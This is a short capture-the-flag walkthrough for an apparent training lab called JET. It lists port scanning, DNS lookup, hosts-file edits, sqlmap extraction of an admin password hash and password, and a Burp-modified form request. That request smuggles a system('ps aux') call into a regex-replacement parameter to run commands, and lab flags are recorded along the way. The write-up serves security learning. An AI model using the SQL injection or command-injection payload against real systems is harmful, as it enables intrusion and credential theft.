                                    Connect & Digging In
http://10.13.37.10/ (got firts connect flag : JET{s4n1ty_ch3ck} )
nmap scan 
open ports are:
Discovered open port 22/tcp on 10.13.37.10
Discovered open port 80/tcp on 10.13.37.10
Discovered open port 8080/tcp on 10.13.37.10
Discovered open port 53/tcp on 10.13.37.10
Discovered open port 5555/tcp on 10.13.37.10
Discovered open port 7777/tcp on 10.13.37.10

dig @10.13.37.10 -x 10.13.37.10
found :{www.securewebinc.jet & securewebinc.jet}
adding these to our /etc/hosts file we can now navigate to www.securewebinc.jet to find our2nd flag.
addind process is like this
step 1 [ nano /etc/hosts ]
step 2 [ 10.13.37.10  www.securewebinc.jet ] next line [ 10.13.37.10  securewebinc.jet ]
second flag { flag : JET{w3lc0me_4nd_h@v3_fun!}  }

Going Deeper & BypassingAuthentication

view page source of this [ http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/login.php ] 
got anoter flag {flag : JET{s3cur3_js_w4s_not_s0_s3cur3_4ft3r4ll} }
use sqlmap on login form and got username and password
+----+------------------------------------------------------------------+----------+
| id | password                                                         | username |
+----+------------------------------------------------------------------+----------+
| 1  | 97114847aa12500d04c0ef3aa6ca1dfd8fca7f156eeb864ab9b0445b235d5084 | admin    |
+----+------------------------------------------------------------------+----------+
 [ Hackthesystem200 ]
 after login got flag [ JET{sQl_1nj3ct1ons_4r3_fun!} ]
 
 😝️Replace in request using burp😝️
 
 swearwords%5B%2Ffuck%2Fe%5D=system('ps+aux')&swearwords%5B%2Fshit%2Fi
%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fi
%5D=penis&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi
%5D=bad+person&to=tony%40a.com&subject=what&message=you+are+a+fuck

next flag [ JET{0v3rfL0w_f0r_73h_lulz} ]


